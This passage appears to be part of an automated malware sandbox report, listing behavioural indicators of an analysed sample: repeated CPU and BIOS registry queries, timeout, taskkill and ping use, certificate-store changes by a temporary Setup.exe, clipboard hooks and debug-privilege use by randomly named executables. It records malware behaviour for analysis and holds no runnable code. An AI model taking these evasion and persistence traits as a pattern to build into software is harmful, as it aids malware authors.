| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (21).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (21).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4402502.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\7948182.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3857461.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
